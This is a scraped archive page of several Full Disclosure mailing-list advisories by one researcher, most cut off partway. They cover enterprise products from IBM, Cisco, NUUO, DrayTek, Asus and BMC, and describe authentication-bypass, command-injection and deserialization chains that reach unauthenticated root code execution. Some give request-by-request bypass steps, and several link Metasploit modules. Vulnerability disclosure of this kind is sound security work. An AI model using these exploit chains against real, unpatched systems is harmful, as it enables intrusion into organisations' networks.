[FD] Multiple 0days in IBM Data Risk Manager

2020-05-01 Thread Pedro Ribeiro
Hi,

I recently attempted to disclose some vulns to IBM via CERT/CC. They refused to 
accept the report, saying they only accept reports from paying customers... 
haha what a  show!

The markdown advisory is attached below - sorry, I usually send text ones, but 
have to move on to the current trends, plus it looks much better on GitHub:
https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md

Metasploit modules have been released and are available here:
https://github.com/rapid7/metasploit-framework/pull/13300
https://github.com/rapid7/metasploit-framework/pull/13301

Enjoy!

# Multiple Vulnerabilities in IBM Data Risk Manager

### By Pedro Ribeiro (ped...@gmail.com) from [Agile Information Security](https://agileinfosec.co.uk)

 Disclosure Date: 21/04/2020 | Last Updated: 21/04/2020  
  
## Introduction
[From the vendor's website](https://www.ibm.com/products/data-risk-manager):  
*What you don’t know can hurt you. Identify and help prevent risks to sensitive 
business data that may impact business processes, operations, and competitive 
position. IBM Data Risk Manager provides executives and their teams a 
business-consumable data risk control center that helps to uncover, analyze, 
and visualize data-related business risks so they can take action to protect 
their business.*

## Summary
**tl;dr scroll to the bottom to see videos of the exploits in action**

IBM Data Risk Manager (IDRM) is an enterprise security product by IBM that 
aggregates and provides a full view of all the enterprise security risks, akin 
to an electronic risk register.  
The product receives information feeds from vulnerability scanning tools and 
other risk management tools, aggregates them and allows a user to investigate 
them and perform comprehensive analysis.

The IDRM Linux virtual appliance was analysed and it was found to contain four 
vulnerabilities, three critical risk and one high risk:  

* Authentication Bypass  
* Command Injection
* Insecure Default Password
* Arbitrary File Download 
  
This advisory describes the four vulnerabilities and the steps necessary to 
chain the first three to achieve unauthenticated remote code execution as root. 
In addition, two Metasploit modules that bypass authentication and exploit the 
[remote code execution](https://github.com/rapid7/metasploit-framework/pull/13300) and 
[arbitrary file download](https://github.com/rapid7/metasploit-framework/pull/13301) are being 
released to the public.

At the time of disclosure, it is unclear if the latest version 2.0.6 is 
affected by these, but most likely it is, as there is no mention of fixed 
vulnerabilities in any changelog, and it was released before the *attempt* to 
report these vulnerabilities to IBM. The latest version Agile InfoSec has 
access to is 2.0.3, and that one is certainly vulnerable.  
  
### Here's a bunch of 0 days!

At the time of disclosure these vulnerabilities are **"0 days"**. An attempt 
was made to contact [CERT/CC](https://www.kb.cert.org/vuls/) to coordinate 
disclosure with IBM, but IBM **REFUSED** to accept the vulnerability report, 
and responded to CERT/CC with:  

***we have assessed this report and closed as being out of scope for our 
vulnerability disclosure program since this product is only for "enhanced" 
support paid for by our customers**. This is outlined in our policy 
https://hackerone.com/ibm. To be eligible to participate in this program, you 
must not be under contract to perform security testing for IBM Corporation, or 
an IBM subsidiary, or IBM client within 6 months prior to submitting a report.*

This is an unbelievable response by IBM, a multi billion dollar company that is 
**selling security enterprise products and security consultancy** to huge 
corporations worldwide. They refused to accept a free high quality 
vulnerability report on one of their products, while putting ludicrous quotes 
like the following [on their website](https://www.ibm.com/security):

*When every second counts, you need a unified defense to identify, orchestrate 
and automate your response to threats. IBM Security Threat Management solutions 
help you thrive in the face of cyber uncertainty.*

*Building a custom security plan that is both industry-specific and aligned to 
your security maturity demands a partner with deep expertise and global reach. 
The IBM Security Strategy and Risk services team is that valued partner.*

It should be noted that IBM offers no bounties on their "bug bounty program", 
just kudos:

![Kudos](./kudos.jpeg)

In any case, I did not ask or expect a bounty since I do not have a HackerOne 
account and I don't agree with HackerOne's or IBM's disclosure terms there. 
I simply wanted to disclose these to IBM responsibly and let them fix it.

### So many questions...
IDRM is an enterprise security product that handles very sensitive information. 
The hacking of an IDRM appliance might lead to a full scale company comprom

[FD] Multiple 0 day vulnerabilities in IBM Data Risk Manager

2020-04-21 Thread Pedro Ribeiro

[FD] Multiple vulns in Cisco UCS Director: from unauth remote access to code execution as root

2019-08-30 Thread Pedro Ribeiro
Hi,

tl;dr three vulns (auth bypass, command injection, default password) in
Cisco UCS and Cisco IMC Supervisor, two of which (auth bypass + command
injection) can be chained to achieve unauthenticated RCE as root

Full advisory below, can also be fetched from
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt

Metasploit modules have been submitted to:
https://github.com/rapid7/metasploit-framework/pull/12243
https://github.com/rapid7/metasploit-framework/pull/12244

Thanks to Accenture Security (previously iDefense) for helping me
disclose this to the vendor!

>> Multiple critical vulnerabilities in Cisco UCS Director, Cisco
Integrated Management Controller Supervisor and Cisco UCS Director
Express for Big Data
>> Discovered by Pedro Ribeiro (ped...@gmail.com) from Agile Information
Security
=
Disclosure: 21/08/2019 / Last updated: 22/08/2019


>> Executive summary:
Cisco UCS Director (UCS) is a cloud orchestration product that automates
common private cloud infrastructure management functions. It is built
using Java and a variety of other technologies and distributed as a
Linux based virtual appliance. A demo of the UCS virtual appliance can
be freely downloaded from Cisco's website [1].

Due to several coding errors, it is possible for an unauthenticated
remote attacker with no privileges to bypass authentication and abuse a
password change function to inject arbitrary commands and execute code
as root.
In addition, there is a default unprivileged user with a known password
that can log in via SSH and execute commands on the virtual appliance
provided by Cisco.
Two Metasploit modules were released with this advisory, one that
exploits the authentication bypass and command injection, and another
that exploits the default SSH password.

Please note that according to Cisco [2] [3] [4], all three
vulnerabilities described in this advisory affect Cisco UCS Director,
Cisco Integrated Management Controller Supervisor and Cisco UCS Director
Express for Big Data. However, Agile Information Security only tested
Cisco UCS Director.

Agile Information Security would like to thank Accenture Security
(previously iDefense) [5] for handling the disclosure process with Cisco.


>> Vendor description [6]:
"Cisco UCS Director delivers a foundation for private cloud
Infrastructure as a Service (IaaS). It is a heterogeneous management
platform that features multivendor task libraries with more than 2500
out-of-the-box workflow tasks for end-to-end converged and
hyperconverged stack automation.
You can extend your capabilities to:
- Automate provisioning, orchestration, and management of Cisco and
third-party infrastructure resources
- Order resources and services from an intuitive self-service portal
- Automate security and isolation models to provide repeatable services
- Standardize and automate multitenant environments across shared
infrastructure instances"


>> Technical details:
#1
Vulnerability: Web Interface Authentication Bypass / CWE-287
CVE-2019-1937
Cisco Bug ID: CSCvp19229 [2]
Risk Classification: Critical
Attack Vector: Remote
Constraints: No authentication required
Affected versions: confirmed in Cisco UCS Director versions 6.6.0 and
6.7.0, see [2] for Cisco's list of affected versions

UCS exposes a management web interface on ports 80 and 443 so that users
of UCS can perform cloud management functions.
Due to a number of coding errors and bad practices, it is possible for
an unauthenticated attacker to obtain an administrative session by
bypassing authentication.
The following sequence of requests and responses shows how the
authentication bypass works.

1.1) First we send a request to ClientServlet to check our
authentication status:
GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1
Host: 10.0.3.100
Referer: https://10.0.3.100/
X-Requested-With: XMLHttpRequest

... to which the server responds with a redirect to the login page since
we are not authenticated:
HTTP/1.1 302 Found
Location: https://10.0.3.100/app/ui/login.jsp
Content-Length: 0
Server: Web

1.2) We now follow the redirection to obtain a JSESSIONID cookie:
GET /app/ui/login.jsp HTTP/1.1
Host: 10.0.3.100
Referer: https://10.0.3.100/
X-Requested-With: XMLHttpRequest

And the server responds with our cookie:
HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC745; Path=/app; Secure; HttpOnly
Server: Web

1.3) Then we repeat the request from 1.1), but this time with the
JSESSIONID cookie obtained in 1.2):
GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1
Host: 10.0.3.100
Referer: https://10.0.3.100/
Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC74;
X-Requested-With: XMLHttpRequest

... and we still get redirected to the login page, as in step 1.1):
HTTP/1.1 302 Found
Location: https://10.0.3.100/app/ui/logi

[FD] [Multiple CVE] - Cisco Identity Services Engine unauth stored XSS to RCE as root

2019-02-05 Thread Pedro Ribeiro
Hi,

On January 20th, SSD disclosed 3 vulnerabilities found by Agile
Information Security in their Cisco Identity Services Engine (ISE) product.

These are unauth stored XSS, unsafe Java deserialization and privesc to
root, which when combined allow an unauthenticated attacker to achieve
remote code execution as root - as long as you can get an admin to visit
the ISE page vulnerable to stored XSS. This is my take on it.

Cisco has been incredibly negligent throughout this whole affair:
- they did not assign CVE numbers to java deserialization and the
privesc, making it impossible to track them
- it is not clear what / if any versions are fixed from their security
bulletins
- they still recommend version 2.4.0.357 as the suggested release in the
downloads section of their website; this is the version we tested and
found vulnerable to everything described below
- the java deserialization and privesc vulnerabilities were
independently found by other researchers and reported around the same
time, but Cisco refused to give Agile Information Security any credit

In summary, this is a total mess. It is pretty evident that Cisco does
not care about security or keeping their customers informed, they just
like to sweep security issues under the rug. Good luck doing that with a
public exploit.

We would like to thank Beyond Security's SSD Disclosure programme for
helping us deal with Cisco and avoid even more headaches. Their advisory
can be found at https://ssd-disclosure.com/index.php/archives/3778 and a
copy of the text below can be found in my repo at
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ise-rce.txt.

Get the exploit from SSD's post or from
https://raw.githubusercontent.com/pedrib/PoC/master/exploits/ISEpwn.rb

==
>> Multiple vulnerabilities in Cisco Identity Services Engine
(unauthenticated stored XSS to RCE as root)
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security and Dominik Czarnota (dominik.b.czarn...@gmail.com)
=
Disclosure: 20/01/2019 / Last updated: 05/02/2019


>> Background and product information
From the vendor's website [1]:
"The Cisco Identity Services Engine (ISE) is your one-stop solution to
streamline security policy management and reduce operating costs. With
ISE, you can see users and devices controlling access across wired,
wireless, and VPN connections to the corporate network.

Cisco ISE allows you to provide highly secure network access to users
and devices. It helps you gain visibility into what is happening in your
network, such as who is connected, which applications are installed and
running, and much more. It also shares vital contextual data, such as
user and device identities, threats, and vulnerabilities with integrated
solutions from Cisco technology partners, so you can identify, contain,
and remediate threats faster."


>> Summary
ISE is distributed by Cisco as a virtual appliance. We have analysed
version 2.4.0.357 and found three vulnerabilities: an unauthenticated
stored cross site scripting, an authenticated Java deserialization
vulnerability leading to remote code execution as an unprivileged user,
and a privilege escalation from that unprivileged user to root.

By putting them all together, we can achieve remote code execution as
root, provided we can trap an administrator into visiting the ISE page
vulnerable to the stored cross site scripting. A Ruby exploit that
implements this full exploit chain (described in more detail at
'Exploitation summary', at the end of this file) is available in [2].

All the vulnerabilities in this advisory were found independently by
Agile Information Security. However, vulnerability #2 (Unsafe Flex AMF
Java Object Deserialization) was also found and reported to Cisco by
Olivier Arteau of Groupe Technologie Desjardins [3] and vulnerability #3
(Privilege Escalation via Incorrect sudo File Permissions) was also
found and reported to Cisco by Hector Cuesta [4].

Cisco refused to credit Agile Information Security with finding
vulnerabilities #2 and #3, and also refused to provide a CVE for both
these vulnerabilities, saying regarding #3 that "This issue has been
evaluated as a hardening effort to improve the security posture of the
device. According with our Security vulnerability policy, we request do
not request a CVE assignment for issue with a Severity Impact Rating
(SIR) lower than Medium. This issue will be fixed in the upcoming ISE
release".
At the time of the latest update, Cisco still recommends version
2.4.0.357 - affected by all the vulnerabilities in this advisory - as
the "Suggested Release" in their software download page.

These actions show Cisco is incredibly negligent with regards to the
security of their customers. They are still shipping (and recommending)
a product version vulnerable to unauthenticated remote code execu

[FD] [Several CVE]: NUUO CMS - multiple vulnerabilities resulting in unauth RCE

2019-01-22 Thread Pedro Ribeiro
Hi,

In October 2018, ICS-CERT issued an advisory for Nuuo CMS:
https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02

Long story short, Nuuo CMS contained several vulnerabilities that allow
an unauthenticated attacker (up to version 2.3) or an authenticated
attacker (up to version 3.5) to achieve RCE, download arbitrary files, etc.

Disclosure on this one took near TWO YEARS. And even after Nuuo saying
they have fixed everything, they clearly haven't. I only held off
disclosing it earlier because I had promised ICS-CERT not to do so.
Their work and patience (ICS-CERT) is much appreciated in this disclosure.

I'm releasing 4 Metasploit exploit modules with this advisory that
target different versions of the software, and the one which exploits
the arbitrary file download still works on the latest version (3.5).

The full advisory is below, and a copy can be fetched from
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt


>> Multiple vulnerabilities in NUUO Central Management Server
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security (http://www.agileinfosec.co.uk/)
==
Disclosure: 11/10/2018 / Last updated: 21/01/2019


>> Background on the affected products:
NUUO is a vendor of Network Video Recording (NVR) systems for
surveillance cameras. These NVR are Linux embedded video recording
systems that can manage a number of cameras and are used worldwide by
public institutions, banks, SME's, etc.

From their webpage:
"The Central Management System (NCS) is a powerful system which brings
traditional central management systems out of the control room through
Internet access. The network-based key operation system can manage
unlimited combinations of analog and network cameras worldwide, via
unlimited working stations in different locations. NCS is the universal
solution for large scale projects.
The NCS System uses client/server architecture to manage unlimited
recording systems. These send events to the NCS Alarm Server. After
filtering the events, the NCS Alarm server sends alarm logs of
pre-determined events to a SQL Server (SQL database) and NCS Client
systems. The NCS Client system allows users in different locations to
log in to the NCS Alarm server and, if they have the authority, to
change the system configuration. The NCS Matrix system can be viewed as
an extension of the NCS client used to populate the alarms to additional
monitors. NCS Matrix system is controlled by NCS Client users."

A more detailed explanation can be found in [1]. Nuuo Central Management
System / NCS will be referred to as CMS for the remainder of this document.

The disclosure of these vulnerabilities was handled by ICS-CERT, which
has generously donated their time to ensure (some) vulnerabilities were
fixed by Nuuo. Their advisory can be seen at [2].
It took Nuuo TWO YEARS to fix 6 out of 7 of the vulnerabilities presented
here, and one of them (authenticated arbitrary file download) is still
unfixed as of the date of the latest update to this advisory.

The vulnerabilities were reported to ICS-CERT on 4/11/2016, and ICS-CERT
reported them to Nuuo shortly after. There were many emails back and
forth between ICS-CERT, myself and Nuuo, until finally ICS-CERT
disclosed the vulnerability on 11/10/2018, 23 days shy of two years.
I will not write a detailed timeline nor disclose any communications, as
it is clear that Nuuo handled this in a very incompetent way. The only
reason I did not disclose it earlier was because of the help and
patience of ICS-CERT.

Four Metasploit modules have been released with this advisory ([3]).
These will be submitted to Metasploit in the coming days and should be
integrated into the framework soon.
A copy of this advisory can be found at [4].


>> Summary:
NUUO CMS uses an ASCII-based network protocol ("NUCM") which is similar
to HTTP. This protocol is used for communication between the CMS client
and the server. The default port for this protocol is TCP 5180.

As an example, for the CMS client to login to CMS server the following
request is sent:
USERLOGIN NUCM/1.0
Version: 
Username: 
Password-Length: 
TimeZone-Length: 



To which the server responds:
NUCM/1.0 200 OK
User-Valid: 1
Server-Version: 
Ini-Version: 1
License-Number: 
User-Session-No: 

The client can then issue a series of commands, such as order cameras to
move, make a backup of the alarms in the server, create a user, etc.

The full list of HTTP-like verbs that the NUCM protocol accepts can be
found in Appendix #A.

While this protocol provides a mechanism for authentication, the
assignment of user session numbers is flawed, and can easily be guessed
by an attacker in under 500,000 attempts (probably less if analysed
thoroughly).

In addition to this, some verbs of the protocol have directory traversal
flaws, which can be exploited by an authenticated attacker to downl

[FD] [CVE-2018-15379] Unauth RCE as root in Cisco Prime Infrastructure

2018-10-08 Thread Pedro Ribeiro
Hi,

Here's a quick and easy unauth RCE as root in Cisco Prime
Infrastructure. This is a product widely deployed in data centers for
router management... good luck.

Thanks to Beyond Security SSD programme for helping me disclose this to
Cisco. Their advisory can be found at:
https://blogs.securiteam.com/index.php/archives/3723
And my own copy at:
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt

Metasploit module has been submitted and waiting for PR:
https://github.com/rapid7/metasploit-framework/pull/10765

Advisory follows:
>> Unauthenticated remote code execution and privilege escalation in
Cisco Prime Infrastructure
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security (http://www.agileinfosec.co.uk/)
==
Disclosure: 4/10/2018 / Last updated: 8/10/2018


>> Introduction:
From the vendor's website ([1]):
"Cisco Prime Infrastructure simplifies the management of wireless and
wired networks. This single, unified solution provides wired and
wireless lifecycle management, and application visibility and control.
It also offers policy monitoring and troubleshooting with the Cisco
Identity Services Engine (ISE) and location-based tracking of mobility
devices with the Cisco Mobility Services Engine (MSE). You can manage
the network, devices, applications, and users – all from one place.
Cisco Prime Infrastructure offers support for 802.11ac, correlated
wired-wireless client visibility, spatial maps, Radio Frequency
prediction tools, and much more. Simplify the management of the wireless
infrastructure while solving problems faster and with fewer resources.
Cisco Prime Infrastructure offers new, guided workflows for the
Intelligent WAN and Converged Access, based on Cisco best practices.
These workflows make new branch rollouts easy and fast, from setting up
devices and services to automatically managing and monitoring them.
Cisco Prime Infrastructure offers fault, configuration, accounting,
performance, and security (FCAPS) management with 360-degree views of
Cisco Unified Computing System Series B Blade Servers and Series C Rack
Servers and Cisco Nexus switches, including the Application-Centric
Infrastructure–ready Cisco Nexus 9000 Series Switches. Your data center
is critical to service assurance. Manage it effectively with Cisco Prime
Infrastructure.
Device Packs offer ongoing support of new Cisco devices and software
releases. It provides parity within each device family, eliminating gaps
in management operations, especially when it comes to service
availability and troubleshooting. Technology Packs deliver new features
between releases, accelerating time to value for high-demand functionality.
Large or global organizations often distribute network management by
domain, region, or country. Cisco Prime Infrastructure Operations Center
lets you visualize up to 10 Cisco Prime Infrastructure instances,
scaling your management infrastructure while maintaining central
visibility and control."


>> Background and summary:
Cisco Prime Infrastructure (CPI) contains two basic flaws that when
exploited allow an unauthenticated attacker to achieve remote code
execution. The first flaw is a file upload vulnerability that allows the
attacker to upload and execute files as the Apache Tomcat user; the
second is a privilege escalation to root by bypassing execution
restrictions in a SUID binary.

A Metasploit module has been released with this advisory, and can be
found at [2] and [3]. This module exploits the two vulnerabilities
described in this advisory to achieve unauthenticated remote code
execution as root on the CPI default installation. It should be
integrated into Metasploit's repository in the coming weeks.

A special thanks to Beyond Security and their SecuriTeam Secure
Disclosure (SSD) programme, which have helped me disclose this
vulnerability to the vendor. Their version of this advisory can be found
in [2].


>> Technical details:
#1
Vulnerability: Arbitrary file upload and execution via tftp and Apache
Tomcat
CVE-2018-15379
Attack Vector: Remote
Constraints: None
Affected products / versions:
- Cisco Prime Infrastructure 3.2 and later (latest version at the time
of writing is 3.4); earlier versions might be affected

Most web applications running on the CPI virtual appliance are deployed
under /opt/CSCOlumos/apache-tomcat-/webapps. One of these
applications is "swimtemp", which symlinks to /localdisk/tftp:

ade # ls -l /opt/CSCOlumos/apache-tomcat-8.5.14/webapps/
total 16
drwxrwxr-x.  3 root gadmin 4096 Mar 29 19:49 ROOT
drwxrwxr-x.  8 root gadmin 4096 Mar 29 21:44 SSO
lrwxrwxrwx.  1 root gadmin   36 Mar 29 21:32 SSO.war -> /opt/CSCOlumos/wars/SSO-13.0.201.war
drwxrwxr-x.  4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest
lrwxrwxrwx.  1 root gadmin   45 Mar 29 21:32 ifm_poap_rest.war ->
/opt/CSCOlumos/wars/ifm_poap

[FD] [CVE-2018-1418] IBM QRadar SIEM unauthenticated remote code execution as root

2018-05-28 Thread Pedro Ribeiro
Hi all,

3 vulns in IBM QRadar SIEM that when chained allow an attacker to
achieve unauthenticated RCE as root on the QRadar host.

IBM have only attributed one CVE for all 3 vulns, and they have a
combined CVSS score of 5.6.

So totally own a SIEM = 5.6 CVSS. Sounds right to me.

A special thanks to Beyond Security's SSD programme, which helped me
disclose these 3 vulnerabilities. See their advisory at:
https://blogs.securiteam.com/index.php/archives/3689

Also available in my repo:
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt

A Metasploit module has been released, and it is pending approval:
https://github.com/rapid7/metasploit-framework/pull/10108

Regards,
Pedro




>> Multiple vulnerabilities in IBM QRadar SIEM
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security (http://www.agileinfosec.co.uk/)
==
Disclosure: 28/05/2018 / Last updated: 25/08/2018


>> Introduction:
From IBM's website [1]:
"IBM® QRadar® SIEM detects anomalies, uncovers advanced threats and
removes false positives. It consolidates log events and network flow
data from thousands of devices, endpoints and applications distributed
throughout a network. It then uses an advanced Sense Analytics engine to
normalize and correlate this data and identifies security offenses
requiring investigation. As an option, it can incorporate IBM X-Force®
Threat Intelligence which supplies a list of potentially malicious IP
addresses including malware hosts, spam sources and other threats.
QRadar SIEM is available on premises and in a cloud environment."


>> Background and summary:
QRadar has a built-in server side application to perform forensic
analysis on certain files.
The vulnerabilities described below show how two logical bugs in the
forensics application can be abused to bypass authentication, write a
file to disk and execute it as an unprivileged user. This file can then
abuse a vulnerability in the way cron jobs are handled to cause a shell
script to be executed as root. In summary, the full exploit chain allows
an unauthenticated attacker to achieve remote code execution as root
with a couple of HTTP requests.

The forensics application is disabled in the free Community Edition, but
the code is still there, and part of it still works. This application
has two components, one servlet running in Java, and the main web
application running PHP.
QRadar has an Apache reverse proxy sitting in front of all its web
applications, which routes requests according to the URL. Requests sent
to /console/* get routed to the main "console" application, which not
only runs the web interface but also performs the main functions of
QRadar (and is not affected by these vulnerabilities).
Then there are several helper applications, such as the forensics
application described above, which can be reached at /forensics and
/ForensicAnalysisServlet, the SOLR server, reachable at /solr and others.

Special thanks to SecuriTeam for helping me disclose this vulnerability.
Please see their advisory at [2] and IBM's response at [3].
Note that IBM have attributed a combined CVE for all three
vulnerabilities, CVE-2018-1418. They have also scored these three
vulnerabilities as CVSS 5.6...
A Metasploit module that exploits these vulnerabilities to achieve
unauthenticated remote code execution as root has been released in [4].


>> Technical details:
#1
Vulnerability: Authentication Bypass (in ForensicAnalysisServlet)
CVE-2018-1418
Attack Vector: Remote
Constraints: None
Affected products / versions:
- IBM QRadar SIEM: 7.3.0 and 7.3.1 confirmed; possibly all versions
released since mid-2014 are affected

QRadar authentication is done via a SEC cookie, which is a session UUID.
This is managed centrally by a session manager which runs in the main
QRadar console application. The SEC cookies can be obtained in three ways:
- Upon login in the main console application
- Using a previously created authorisation token (also created in the
console)
- From the /etc/qradar/conf/host.token file, which contains a UUID
generated at install time, used by internal services to perform
administrative actions.

The ForensicAnalysisServlet stores the SEC cookie in a HashMap, and then
checks if the cookie is valid with the console application before
committing any action... except for one specific codepath.

The function doGetOrPost() processes all requests to
ForensicsAnalysisServlet. This function does a number of actions, such
as fetching a results file, checking the status of an analysis request, etc.
In order to authenticate, the requester has to have its SEC and
QRadarCSRF tokens registered with the servlet. This is done by
application with the setSecurityTokens action, with which a requester
specifies both tokens and registers them with the servlet.
In order to perform authentication fo

[FD] [CVE-2017-5641] - DrayTek Vigor ACS 2 Java Deserialisation RCE

2018-04-20 Thread Pedro Ribeiro
Hi all,

tl;dr DrayTek Vigor ACS server, a remote enterprise management system
for DrayTek routers, uses a vulnerable version of the Adobe / Apache
Flex Java library that has a deserialisation vulnerability. This can be
exploited by an unauthenticated attacker to achieve RCE as root / SYSTEM
on all versions until 2.2.2.

Full advisory is below, and a copy of it plus the exploit code is in my
repo https://github.com/pedrib/PoC/tree/master/exploits/acsPwn.

Thanks to Beyond Security SSD programme for helping me disclose this
vulnerability to the vendor. You can find details on their blog at
https://blogs.securiteam.com/index.php/archives/3681



>> DrayTek VigorACS 2 Unsafe Flex AMF Java Object Deserialization
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
=
Disclosure: 18/04/2018 / Last updated: 19/04/2018


>> Background and summary
From the vendor's website [1]:
"VigorACS 2 is a powerful centralized management software for Vigor
Routers and VigorAPs, it is an integrated solution for configuring,
monitoring, and maintenance of multiple Vigor devices from a single
portal. VigorACS 2 is based on TR-069 standard, which is an application
layer protocol that provides the secure communication between the server
and CPEs, and allows Network Administrator to manage all the Vigor
devices (CPEs) from anywhere on the Internet. VigorACS 2 Central
Management is suitable for the enterprise customers with a large scale
of DrayTek routers and APs, or the System Integrator who need to provide
a real-time service for their customer's DrayTek devices."

VigorACS is a Java application that runs on both Windows and Linux. It
exposes a number of servlets / endpoints under /ACSServer, which are
used for various functions of VigorACS, such as the management of
routers and firewalls using the TR-069 protocol [2].

One of the endpoints exposed by VigorACS, at /ACSServer/messagebroker/amf,
is an Adobe/Apache Flex service that is reachable by the managed routers
and firewalls. This advisory shows that VigorACS uses a Flex version that is
vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java
deserialization for Flex AMF objects, which can be abused to achieve
unauthenticated remote code execution as root under Linux or SYSTEM
under Windows.

This vulnerability was disclosed under Beyond Security SecuriTeam Secure
Disclosure (SSD) programme, which has provided assistance to the vendor
throughout the disclosure process [4].


>> Technical details:
Vulnerability: Unsafe Flex AMF Java Object Deserialization
CVE-2017-5641
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on v2.2.1; earlier versions most likely
affected

By sending an HTTP POST request with random data to
/ACSServer/messagebroker/amf, the server will respond with a 200 OK and
binary data that includes:
 ...Unsupported AMF version X...

While in the server logs, a stack trace will be produced that includes
the following:
flex.messaging.io.amf.AmfMessageDeserializer.readMessage ...
flex.messaging.endpoints.amf.SerializationFilter.invoke ...
...

A quick Internet search revealed CVE-2017-5641 [3], which clearly states
in its description:
"Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not
restrict which types were allowed for AMF(X) object deserialization by
default. During the deserialization process code is executed that for
several known types has undesired side-effects. Other, unknown types may
also exhibit such behaviors. One vector in the Java standard library
exists that allows an attacker to trigger possibly further exploitable
Java deserialization of untrusted data. Other known vectors in third
party libraries can be used to trigger remote code execution."

Further reading in [5], [6] and [7] led to proof of concept code
(Appendix A) that creates a binary payload that can be exploited to
achieve remote code execution through unsafe Java deserialization.

A fully working exploit has been released with this advisory that works
in the following way:
a) sends an AMF binary payload to /ACSServer/messagebroker/amf as
described in [6] to trigger a Java Remote Method Protocol (JRMP) call
back to the attacker
b) receives the JRMP connection with ysoserial's JRMP listener [8]
c) configures ysoserial to respond with a CommonsCollections5 or
CommonsCollections6 payload, as a vulnerable version of Apache Commons
3.1 is in the Java classpath of the server
d) executes code as root / SYSTEM

The exploit has been tested against the Linux and Windows Vigor ACS
2.2.1, although it requires a ysoserial jar patched for multi argument
handling (a separate branch in [8], or alternatively a ysoserial patched
with CommonsCollections5Chained or CommonsCollections6Chained - see [9]).

Appendix A contains the Java code used to gen

Re: [FD] SSD Advisory – Hack2Win – Asus Unauthenticated LAN Remote Command Execution

2018-01-26 Thread Pedro Ribeiro
On 22 January 2018 at 19:00, Maor Shwartz <ma...@beyondsecurity.com> wrote:

> SSD Advisory – Hack2Win – Asus Unauthenticated LAN Remote Command Execution
>
> Full report: https://blogs.securiteam.com/index.php/archives/3589
> Twitter: @SecuriTeam_SSD
> Weibo: SecuriTeam_SSD
>
> Vulnerabilities Summary
> The following advisory describes two (2) vulnerabilities found in AsusWRT
> Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to
> LAN remote command execution on any Asus router.
>
> AsusWRT is “THE POWERFUL USER-FRIENDLY INTERFACE – The enhanced ASUSWRT
> graphical user interface gives you easy access to the 30-second, 3-step
> web-based installation process. It’s also where you can configure AiCloud
> 2.0 and all advanced options. ASUSWRT is web-based, so it doesn’t need a
> separate app, or restrict what you can change via mobile devices — you get
> full access to everything, from any device that can run a web browser”
>
> The vulnerabilities found are:
>
> Access bypass
> Configuration manipulation
>
> Credit
> An independent security researcher, Pedro Ribeiro (pedrib_at_gmail.com),
> has reported this vulnerability to Beyond Security’s SecuriTeam Secure
> Disclosure program.
>
> Vendor response
> Asus were informed of the vulnerabilities and released patches to address
> them (version 3.0.0.4.384_10007).
>
> For more details:
> https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/
>
>
Just to add that MITRE has provided CVE for the issues found:

Access bypass: CVE-2018-5999
Configuration manipulation: CVE-2018-6000

Thanks again to SecuriTeam for helping with the disclosure.

Advisory links have been updated:
https://blogs.securiteam.com/index.php/archives/3589
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt

Regards,
Pedro

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [CVE-2016-6598/9]: RCE and admin cred disclosure in BMC Track-It! 11.4

2018-01-26 Thread Pedro Ribeiro
Happy new year!

I was doing some new year cleaning and realised I never released this
advisory properly. Two vulnerabilities in BMC Track-It! 11.4 which were
disclosed by SecuriTeam Secure Disclosure on July 2016.

Posting here because I've seen quite a few of these still in active use,
live and deployed in corporate networks.
The exploit is available in my repo at [3]. It's also interesting to see
how they completely ignored my advice, but I'm used to that. Here it is
in full glory for your reading pleasure.

This advisory and exploit can also be fetched at my github repo
(https://github.com/pedrib/PoC) and in the SSD blog at
https://blogs.securiteam.com/index.php/archives/2713. A big thanks to
SecuriTeam for helping out as always.

>> Multiple critical vulnerabilities in BMC Track-It! 11.4
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security

=
Disclosure: 04/07/2016 / Last updated: 01/01/2017


>> Background and summary
BMC Track-It! exposes several .NET remoting services on port 9010. .NET
remoting is a remote method technology similar to Java RMI or CORBA
which allows you to invoke methods remotely and retrieve their result.

These remote methods are used when a technician uses the Track-It!
client console to communicate with the central Track-It! server. A
technician would invoke these methods for obtaining tickets, creating a
new ticket, uploading files to tickets, etc.

On October 2014, two 0 day vulnerabilities for Track-It! 11.3 were
disclosed (under CVE-2014-4872, see [1]). The vulnerabilities were due
to the Track-It! server accepting remote method invocations without any
kind of authentication or encryption. The vulnerabilities were very
severe: one allowed an attacker to execute code on the server as NETWORK
SERVICE or SYSTEM, while the other would allow an attacker to obtain the
domain administrator and SQL server passwords if the Track-It! server
had password reset turned on.

These vulnerabilities were discovered in a trivial manner - simply by
turning Wireshark on and observing the packets one could see the remote
method invocations and objects being passed around. Duplicate and even
triplicate packets would not be rejected by the server, which would
execute whatever action was requested in the packet.

Disclosure was done by the US-CERT, which attempted to contact BMC but
received no response after 45 days. After this period they released the
vulnerability information and I released two Metasploit exploits.

